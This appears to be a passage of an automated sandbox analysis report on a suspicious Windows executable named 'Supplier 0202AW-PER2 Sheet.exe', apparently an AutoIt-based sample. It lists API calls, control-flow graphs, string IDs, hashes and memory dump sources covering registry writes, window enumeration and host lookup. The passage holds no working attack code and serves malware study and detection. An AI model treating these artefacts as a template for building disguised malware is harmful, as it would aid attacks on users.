                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6F26
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6F3B
                                                                                                                  • __close_nolock.LIBCMT ref: 00DA6F9B
                                                                                                                    • Part of subcall function 00D9F84C: CloseHandle.KERNEL32(00000000,00E1EEC4,00000000,?,00DA6DF1,00E1EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D9F89C
                                                                                                                    • Part of subcall function 00D9F84C: GetLastError.KERNEL32(?,00DA6DF1,00E1EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00D9F8A6
                                                                                                                    • Part of subcall function 00D9F84C: __free_osfhnd.LIBCMT ref: 00D9F8B3
                                                                                                                    • Part of subcall function 00D9F84C: __dosmaperr.LIBCMT ref: 00D9F8D5
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6FBD
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DA70F2
                                                                                                                  • ___createFile.LIBCMT ref: 00DA7111
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00DA711E
                                                                                                                  • __dosmaperr.LIBCMT ref: 00DA7125
                                                                                                                  • __free_osfhnd.LIBCMT ref: 00DA7145
                                                                                                                  • __invoke_watson.LIBCMT ref: 00DA7173
                                                                                                                  • __wsopen_helper.LIBCMT ref: 00DA718D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3896587723-2766056989
                                                                                                                  • Opcode ID: 7ac0f864f479f3d1f5bc043674ba63e8f9696130fc32a180a9bcb5874c5c3a6f
                                                                                                                  • Instruction ID: c37d2d79f7d4bb18a27f0bfed74735e489ca5ff0e65214e19bacd08302fbaae9
                                                                                                                  • Opcode Fuzzy Hash: 7ac0f864f479f3d1f5bc043674ba63e8f9696130fc32a180a9bcb5874c5c3a6f
                                                                                                                  • Instruction Fuzzy Hash: CC220071904209DBEF259F68DC55BAE7B71EB02320F2C8229E561AB2E1C739CD40D771

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00DB76ED
                                                                                                                  • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00DB7713
                                                                                                                  • _wcscpy.LIBCMT ref: 00DB7741
                                                                                                                  • _wcscmp.LIBCMT ref: 00DB774C
                                                                                                                  • _wcscat.LIBCMT ref: 00DB7762
                                                                                                                  • _wcsstr.LIBCMT ref: 00DB776D
                                                                                                                  • 755A1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DB7789
                                                                                                                  • _wcscat.LIBCMT ref: 00DB77D2
                                                                                                                  • _wcscat.LIBCMT ref: 00DB77D9
                                                                                                                  • _wcsncpy.LIBCMT ref: 00DB7804
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$FileInfoVersion$A1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                  • API String ID: 1513093770-1459072770
                                                                                                                  • Opcode ID: 34e3b9e615064cf18937b8d2f356b64b5d3db6c0559bee67e9d459c7e960710c
                                                                                                                  • Instruction ID: 6d883d578eb61b72813e60981dda2af15db94a199047885f781c12c3a578b05b
                                                                                                                  • Opcode Fuzzy Hash: 34e3b9e615064cf18937b8d2f356b64b5d3db6c0559bee67e9d459c7e960710c
                                                                                                                  • Instruction Fuzzy Hash: 4B41D076A04300BBEB01B7649C87EBF7BACEF55710F14005AF801F6182EB649A01DAB1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 608 d71f04-d71f9c call d72d1a * 2 call d7c935 * 2 call d77e53 call d7d3d2 * 3 625 d71fa2-d71fa6 608->625 626 de2569-de2575 call d92626 608->626 628 de257d-de2583 call dae4ea 625->628 629 d71fac-d71faf 625->629 626->628 631 de258f-de259b call d7a4f6 628->631 629->631 632 d71fb5-d71fb8 629->632 640 de2899-de289d 631->640 641 de25a1-de25b1 call d7a4f6 631->641 632->631 634 d71fbe-d71fc7 GetForegroundWindow call d7200a 632->634 639 d71fcc-d71fe3 call d7197e 634->639 651 d71fe4-d72007 call d75cd3 * 3 639->651 643 de289f-de28a6 call d7c935 640->643 644 de28ab-de28ae 640->644 641->640 654 de25b7-de25c5 641->654 643->644 648 de28b7-de28c4 644->648 649 de28b0 644->649 652 de28d6-de28da 648->652 653 de28c6-de28d4 call d7b8a7 CharUpperBuffW 648->653 649->648 655 de28dc-de28df 652->655 656 de28f1-de28fa 652->656 653->652 659 de25c9-de25e1 call dad68d 654->659 655->656 660 de28e1-de28ef call d7b8a7 CharUpperBuffW 655->660 661 de28fc-de2909 GetDesktopWindow EnumChildWindows 656->661 662 de290b EnumWindows 656->662 659->640 670 de25e7-de25f7 call d8f885 659->670 660->656 668 de2911-de2930 call dae44e call d72d1a 661->668 662->668 685 de2932-de293b call d7200a 668->685 686 de2940 668->686 680 de25fd-de260d call d8f885 670->680 681 de287b-de288b call d8f885 670->681 692 de2613-de2623 call d8f885 680->692 693 de2861-de2871 call d8f885 680->693 690 de288d-de2891 681->690 691 de2873-de2876 681->691 685->686 690->651 694 de2897 690->694 701 de281d-de2836 call db88a2 IsWindow 692->701 702 de2629-de2639 call d8f885 692->702 693->691 700 de2842-de2848 GetForegroundWindow 693->700 698 de2852-de2858 694->698 698->693 704 de2849-de2850 call d7200a 700->704 701->651 709 de283c-de2840 701->709 711 de263b-de2640 702->711 712 de2659-de2669 call d8f885 702->712 704->698 709->704 714 de280d-de280f 711->714 715 de2646-de2657 call d75cf6 711->715 720 de267a-de268a call d8f885 712->720 721 de266b-de2675 712->721 716 de2817-de2818 714->716 722 de269b-de26a7 call d75be9 715->722 716->651 728 de268c-de2698 call d75cf6 720->728 729 de26b5-de26c5 call d8f885 720->729 723 de27e6-de27f0 call d7c935 721->723 735 de26ad-de26b0 722->735 736 de2811-de2813 722->736 734 de2804-de2808 723->734 728->722 739 de26c7-de26de call d92241 729->739 740 de26e3-de26f3 call d8f885 729->740 734->659 735->734 736->716 739->734 745 de26f5-de270c call d92241 740->745 746 de2711-de2721 call d8f885 740->746 745->734 751 de273f-de274f call d8f885 746->751 752 de2723-de273a call d92241 746->752 757 de276d-de277d call d8f885 751->757 758 de2751-de2768 call d92241 751->758 752->734 763 de277f-de2793 call d92241 757->763 764 de2795-de27a5 call d8f885 757->764 758->734 763->734 769 de27a7-de27b7 call d8f885 764->769 770 de27c3-de27d3 call d8f885 764->770 769->691 775 de27bd-de27c1 769->775 776 de27d5-de27da 770->776 777 de27f2-de2802 call dad614 770->777 775->734 778 de27dc-de27e2 776->778 779 de2815 776->779 777->691 777->734 778->723 779->716
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • GetForegroundWindow.USER32 ref: 00D71FBE
                                                                                                                  • IsWindow.USER32(?), ref: 00DE282E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Foreground_memmove
                                                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                  • API String ID: 3828923867-1919597938
                                                                                                                  • Opcode ID: 167069c086eeda442a525bc8923dbb592c0065dd9ccb19ee355d85c65655acd6
                                                                                                                  • Instruction ID: 48c5b947af8cbaf1b23c69f50bb0f68e45b813daa3624d29f53b288ad836f234
                                                                                                                  • Opcode Fuzzy Hash: 167069c086eeda442a525bc8923dbb592c0065dd9ccb19ee355d85c65655acd6
                                                                                                                  • Instruction Fuzzy Hash: 02D1D970104642EBCB04FF15C881AB9BBB5FF54344F188A2DF499975A1DB30E959CBB2

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 782 dd352a-dd3569 call d7d3d2 * 3 789 dd356b-dd356e 782->789 790 dd3574-dd35e7 call d784a6 call dd3d7b call dd3af7 782->790 789->790 791 dd35f9-dd360d call d82570 789->791 804 dd35e9-dd35f4 call dbd7e4 790->804 805 dd3612-dd3617 790->805 798 dd3a94-dd3ab7 call d75cd3 * 3 791->798 804->791 808 dd366d 805->808 809 dd3619-dd362e RegConnectRegistryW 805->809 811 dd3671-dd369c RegCreateKeyExW 808->811 812 dd3667-dd366b 809->812 813 dd3630-dd3662 call d77ba9 call dbd7e4 call d82570 809->813 815 dd369e-dd36d2 call d77ba9 call dbd7e4 call d82570 811->815 816 dd36e7-dd36ec 811->816 812->811 813->798 815->798 840 dd36d8-dd36e2 RegCloseKey 815->840 820 dd3a7b-dd3a8c RegCloseKey 816->820 821 dd36f2-dd3715 call d784a6 call d91bc7 816->821 820->798 824 dd3a8e-dd3a92 RegCloseKey 820->824 835 dd3717-dd376d call d784a6 call d918fb call d784a6 * 2 RegSetValueExW 821->835 836 dd3796-dd37b6 call d784a6 call d91bc7 821->836 824->798 835->820 861 dd3773-dd3791 call d77ba9 call d82570 835->861 847 dd37bc-dd3814 call d784a6 call d918fb call d784a6 * 2 RegSetValueExW 836->847 848 dd3840-dd3860 call d784a6 call d91bc7 836->848 840->798 847->820 881 dd381a-dd383b call d77ba9 call d82570 847->881 862 dd3949-dd3969 call d784a6 call d91bc7 848->862 863 dd3866-dd38c9 call d784a6 call d9010a call d784a6 call d73b1e 848->863 878 dd3a74 861->878 883 dd396b-dd398b call d7cdb4 call d784a6 862->883 884 dd39c6-dd39e6 call d784a6 call d91bc7 862->884 898 dd38e9-dd3918 call d784a6 RegSetValueExW 863->898 899 dd38cb-dd38d0 863->899 878->820 881->820 907 dd398d-dd39a1 RegSetValueExW 883->907 904 dd39e8-dd3a0e call d7d00b call d784a6 884->904 905 dd3a13-dd3a30 call d784a6 call d91bc7 884->905 915 dd393d-dd3944 call d9017e 898->915 916 dd391a-dd3936 call d77ba9 call d82570 898->916 902 dd38d8-dd38db 899->902 903 dd38d2-dd38d4 899->903 902->899 908 dd38dd-dd38df 902->908 903->902 904->907 929 dd3a67-dd3a71 call d82570 905->929 930 dd3a32-dd3a60 call dbbe47 call d784a6 call dbbe8a 905->930 907->820 912 dd39a7-dd39c1 call d77ba9 call d82570 907->912 908->898 913 dd38e1-dd38e5 908->913 912->878 913->898 915->820 916->915 929->878 930->929
                                                                                                                  APIs
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD3626
                                                                                                                  • RegCreateKeyExW.KERNEL32(?,?,00000000,00E0DBF0,00000000,?,00000000,?,?), ref: 00DD3694
                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00DD36DC
                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00DD3765
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00DD3A85
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00DD3A92
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                  • Opcode ID: 435cc1942304d259922af71e77e4cc7b2cfb395425f44d278da59ff4fb57e877
                                                                                                                  • Instruction ID: ce02f48b6f4aa30c364f4a7b9783267a583cb21239b76e357798d244507dc30f
                                                                                                                  • Opcode Fuzzy Hash: 435cc1942304d259922af71e77e4cc7b2cfb395425f44d278da59ff4fb57e877
                                                                                                                  • Instruction Fuzzy Hash: E0026F75604602AFCB14EF24C895E2AB7E5FF89724F04855DF88A9B361DB70ED01CB62

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,00000000,00000001,00000000), ref: 00D7428C
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00D91BC7: __wcsicmp_l.LIBCMT ref: 00D91C50
                                                                                                                  • _wcscpy.LIBCMT ref: 00D743C0
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00DE214E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe$CMDLINE$CMDLINERAW
                                                                                                                  • API String ID: 861526374-2782274033
                                                                                                                  • Opcode ID: 799b46e2f343dc77cbc3cda7a00d91323dfcf565e68caefbc57ef4b78b517d15
                                                                                                                  • Instruction ID: 6762fe7d5d7f30b8d466aa7a1ec69515d3b2619c13681328683efc758237d997
                                                                                                                  • Opcode Fuzzy Hash: 799b46e2f343dc77cbc3cda7a00d91323dfcf565e68caefbc57ef4b78b517d15
                                                                                                                  • Instruction Fuzzy Hash: 05818172900219AACB06EBE4CD56EEF7BBCEF15354F104019E549B7081FB606A49DB72

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00D8EA39
                                                                                                                  • __wsplitpath.LIBCMT ref: 00D8EA56
                                                                                                                    • Part of subcall function 00D9297D: __wsplitpath_helper.LIBCMT ref: 00D929BD
                                                                                                                  • _wcsncat.LIBCMT ref: 00D8EA69
                                                                                                                  • __makepath.LIBCMT ref: 00D8EA85
                                                                                                                    • Part of subcall function 00D92BFF: __wmakepath_s.LIBCMT ref: 00D92C13
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                  • _wcscpy.LIBCMT ref: 00D8EABE
                                                                                                                    • Part of subcall function 00D8EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00D8EADA,?,?), ref: 00D8EB27
                                                                                                                  • _wcscat.LIBCMT ref: 00DE32FC
                                                                                                                  • _wcscat.LIBCMT ref: 00DE3334
                                                                                                                  • _wcsncpy.LIBCMT ref: 00DE3370
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                  • String ID: Include$\$"
                                                                                                                  • API String ID: 1213536620-2474423117
                                                                                                                  • Opcode ID: 729673f7c9e7da333e52a720d5bfeea8d7a23cd2448ab7df49e325da2f6f40c4
                                                                                                                  • Instruction ID: dffbb1d549bc03d3a9dfd5a5e50a5c463c966aae2696ee8dea86b9771ced4c85
                                                                                                                  • Opcode Fuzzy Hash: 729673f7c9e7da333e52a720d5bfeea8d7a23cd2448ab7df49e325da2f6f40c4
                                                                                                                  • Instruction Fuzzy Hash: C95191B1404345AFC705EF56EC89CABBBE8FB49300F40451EF685A3261EB749648CB76

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1143 db78ee-db7911 WSAStartup 1144 db79b1-db79bd call d91943 1143->1144 1145 db7917-db7938 gethostname gethostbyname 1143->1145 1154 db79be-db79c1 1144->1154 1145->1144 1146 db793a-db7941 1145->1146 1148 db794e-db7950 1146->1148 1149 db7943 1146->1149 1152 db7952-db795f call d91943 1148->1152 1153 db7961-db79a6 call d8faa0 inet_ntoa call d93220 call db8553 call d91943 call d9017e 1148->1153 1151 db7945-db794c 1149->1151 1151->1148 1151->1151 1160 db79a9-db79af WSACleanup 1152->1160 1153->1160 1160->1154
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                  • String ID: 0.0.0.0
                                                                                                                  • API String ID: 208665112-3771769585
                                                                                                                  • Opcode ID: 43d724a90cf5b8b6a2f4573d5ddef7f2cf60d95d2d581266fc40b738c41346ac
                                                                                                                  • Instruction ID: fcf8c553a1c72db1f21478b87c1154f4542c5821ebb04f83b95f35979b143f4d
                                                                                                                  • Opcode Fuzzy Hash: 43d724a90cf5b8b6a2f4573d5ddef7f2cf60d95d2d581266fc40b738c41346ac
                                                                                                                  • Instruction Fuzzy Hash: 8E11A271A08225EFDF24A7709C4AEEA77ADEB41720F044065F456E6191EE70DA818EB0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00D730B0
                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00D730BF
                                                                                                                  • LoadIconW.USER32(00000063), ref: 00D730D5
                                                                                                                  • LoadIconW.USER32(000000A4), ref: 00D730E7
                                                                                                                  • LoadIconW.USER32(000000A2), ref: 00D730F9
                                                                                                                    • Part of subcall function 00D7318A: LoadImageW.USER32(00D70000,00000063,00000001,00000010,00000010,00000000), ref: 00D731AE
                                                                                                                  • RegisterClassExW.USER32(?), ref: 00D73167
                                                                                                                    • Part of subcall function 00D72F58: GetSysColorBrush.USER32(0000000F), ref: 00D72F8B
                                                                                                                    • Part of subcall function 00D72F58: RegisterClassExW.USER32(00000030), ref: 00D72FB5
                                                                                                                    • Part of subcall function 00D72F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72FC6
                                                                                                                    • Part of subcall function 00D72F58: LoadIconW.USER32(000000A9), ref: 00D73009
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                  • API String ID: 2880975755-4155596026
                                                                                                                  • Opcode ID: 9e96bad7eee8c5e445f8e13715e73377061f270bb0ec248184f2b77f9a73f256
                                                                                                                  • Instruction ID: a9086b2d7f1f21438b928f2eed59aef3fdb5ffec8294af4102d1a2a2ec08308a
                                                                                                                  • Opcode Fuzzy Hash: 9e96bad7eee8c5e445f8e13715e73377061f270bb0ec248184f2b77f9a73f256
                                                                                                                  • Instruction Fuzzy Hash: FD212F70D05308AFCB049FAAEC4DA99BFB5EB48310F04816EE618B62A0D7754948DFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
